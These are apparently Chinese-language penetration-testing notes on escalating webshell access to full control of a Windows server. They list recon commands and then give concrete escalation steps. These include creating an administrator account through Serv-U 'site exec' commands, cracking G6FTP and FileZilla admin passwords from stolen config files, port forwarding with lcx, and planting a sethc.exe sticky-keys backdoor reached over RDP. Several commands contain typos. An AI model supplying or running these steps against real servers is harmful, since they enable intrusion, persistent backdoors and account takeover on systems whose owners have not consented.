一、提权
1、什么是提权
主要针对网站测试过程中,当测试某一网站时,通过各种漏洞提升webshell权限来拿到该服务器的权限。
2、常见脚本所处的权限
asp/PHP 匿名权限(网络服务权限,权限较小)
aspx user权限(普通用户权限)
jsp 系统权限(通常)
3、收集信息
要确定以下信息
内/外网
服务器系统和版本位数
服务器的补丁情况
服务器的安装软件情况
服务器的防护软件情况
端口情况
支持脚本的情况
信息收集常用命令
Windows:
ipconfig /all 查看当前ip
net user 查看当前服务器账号情况
netstat –ano 查看当前服务器端口开放情况
ver 查看当前服务器操作糸统
systeminfo 查看当前服务器配置信息(补丁情况)
tasklist /svc 查看当前服务器进程
taskkill –PID ID号 结束某个pid号的进程
taskkill lim qq.exe /f 结束qq进程
net user abc abc /add 添加一个用户名为abc密码为abc的用户
whoami 查看当前操作用户(当前权限)
Linux:
ls –al 查看当前服务器的文件和文件夹
pwd 查看当前操作路径
uname -a 查看当前服务器的内核信息
4、cmd执行命令
1、防护软件拦截
2、cmd被降权
3、组件被删除
找到可读写目录上传cmd.exe,将执行的cmd.exe路径替换成上传的路径,再次调用。
5、查找3389
1、注册表读取
2、工具扫描
3、命令探针
二、Windows提权
第三方软件提权
溢出提权
启动项提权
破解hash提权
数据库提权
1、常见的第三方软件提权
FTP软件:
server –u、g6ftp、FileZilla
远程管理软件:
PCanywhere、readmin、vnc
2、server-u提权
有修改权限
0、检查是否有可写权限,修改server-u,默认安装目录下的servUDaemou.ini
1、增加用户
2、连接
3、执行命令
quote site exec bet user abc abc.com /add
quote site exec net localgroup administertors abc /add
无修改权限
暴力破解mds
溢出提权
3、G6ftp提权
下载管理配置文件,将administrator管理密码破解
使用lcx端口转发(默认只允许本机连接)
lcx.exe –tran 8027 127.0.0.1 8021
使用客户端管理员用户登录
创建用户并设置权限和执行的批处理文件
上传批处理
已创建的普通用户登录ftp
执行命令quate site x.bat
x.bat内容为添加系统用户 提权
4、filezilla提权
filezilla是一款开源的ftp服务器和客户端的软件若安装了服务器默认只监听127.0.0.1的14147端口并且默认安装目录下有两个敏感文件
filezillaserver.xml(包含了用户信息)
filezillaserver interface.xml(包含了管理信息)
提权思路
下载这两个文件,拿到管理密码
配置端口转发,登录远程管理ftpserver创建ftp用户
分配权限,设置家目录为c:\
使用cmd.exe改名为sethc.exe替换
c:\windows\system32\sethc.exe生成shift后门
连接3389按5次shift调出cmd.exe
query user 显示管理员是否在线